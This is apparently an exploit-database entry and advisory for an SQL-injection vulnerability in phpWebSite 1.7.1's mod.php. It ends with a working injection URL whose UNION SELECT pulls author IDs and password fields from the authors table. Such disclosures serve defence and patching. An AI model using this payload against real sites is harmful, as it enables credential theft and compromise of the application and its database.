[] NeoSense

phpWebSite 1.7.1 - 'mod.php' SQL Injection

Author: Ehsan_Hp200
type: webapps
platform: php
port: 
date_added: 2011-08-27 
date_updated: 2015-02-15 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/49354/info

phpWebSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors